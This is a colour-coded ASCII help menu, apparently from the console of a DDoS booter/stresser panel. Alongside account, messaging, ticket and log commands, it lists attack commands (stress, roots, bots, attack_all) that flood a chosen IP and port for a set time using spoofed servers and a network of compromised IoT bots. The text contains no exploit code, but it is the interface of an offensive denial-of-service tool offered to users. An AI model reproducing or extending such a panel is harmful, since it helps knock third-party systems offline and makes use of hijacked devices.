   {WHITE}╔═════════════╦═════════════════╦════════════════════════════════════════╗
   ║ {PURPLE}Command{WHITE}     ║ {PURPLE}Description{WHITE}     ║ {PURPLE}Command Usage{WHITE}                          ║
   ╠═════════════╬═════════════════╬════════════════════════════════════════╣
   ║ {PURPLE}Help{WHITE}        ║ {PURPLE}List of Cmds{WHITE}    ║ {PURPLE}help | ?{WHITE}                               ║
   ║ {PURPLE}Clear{WHITE}       ║ {PURPLE}Clear Screen{WHITE}    ║ {PURPLE}clear | cls{WHITE}                            ║
   ║ {PURPLE}Username{WHITE}    ║ {PURPLE}account name{WHITE}    ║ {PURPLE}whoami{WHITE}                                 ║
   ║ {PURPLE}Info{WHITE}        ║ {PURPLE}Show Acc Info{WHITE}   ║ {PURPLE}info{WHITE}                                   ║
   ║ {PURPLE}Change PW{WHITE}   ║ {PURPLE}Change password{WHITE} ║ {PURPLE}passwd{WHITE}                                 ║
   ║ {PURPLE}Methods{WHITE}     ║ {PURPLE}Method list{WHITE}     ║ {PURPLE}methods{WHITE}                                ║
   ║ {PURPLE}Stresser{WHITE}    ║ {PURPLE}Attack an IP{WHITE}    ║ {PURPLE}stress <ip> <port> <time> <method>{WHITE}     ║
   ║ {PURPLE}Root/Spoofs{WHITE} ║ {PURPLE}Attack an IP{WHITE}    ║ {PURPLE}roots <ip> <port> <time> <method>{WHITE}      ║
   ║ {PURPLE}Bots{WHITE}        ║ {PURPLE}Attack an IP{WHITE}    ║ {PURPLE}bots <ip> <port> <time> <method>{WHITE}       ║
   ║ {PURPLE}Attack all{WHITE}  ║ {PURPLE}Attack an IP{WHITE}    ║ {PURPLE}attack_all <ip> <port> <time> <method>{WHITE} ║
   ║ {PURPLE}Users{WHITE}       ║ {PURPLE}Online users{WHITE}    ║ {PURPLE}users{WHITE}                                  ║
   ║ {PURPLE}ioT{WHITE}         ║ {PURPLE}List of bots{WHITE}    ║ {PURPLE}iot{WHITE}                                    ║
   ║ {PURPLE}Message{WHITE}     ║ {PURPLE}Send a message{WHITE}  ║ {PURPLE}msg <user> <msg>{WHITE}                       ║
   ║ {PURPLE}Ticket{WHITE}      ║ {PURPLE}Submit a ticket{WHITE} ║ {PURPLE}ticket <msg>{WHITE}                           ║
   ║ {PURPLE}Logs{WHITE}        ║ {PURPLE}All acc logs{WHITE}    ║ {PURPLE}logs{WHITE}                                   ║
   ║ {PURPLE}attacks{WHITE}     ║ {PURPLE}All attack logs{WHITE} ║ {PURPLE}attacks{WHITE}                                ║
   ║ {PURPLE}logins{WHITE}      ║ {PURPLE}All login logs{WHITE}  ║ {PURPLE}logins{WHITE}                                 ║
   ║ {PURPLE}admin{WHITE}       ║ {PURPLE}Admin cmd list{WHITE}  ║ {PURPLE}admin{WHITE}                                  ║
   ╚═════════════╩═════════════════╩════════════════════════════════════════╝
   
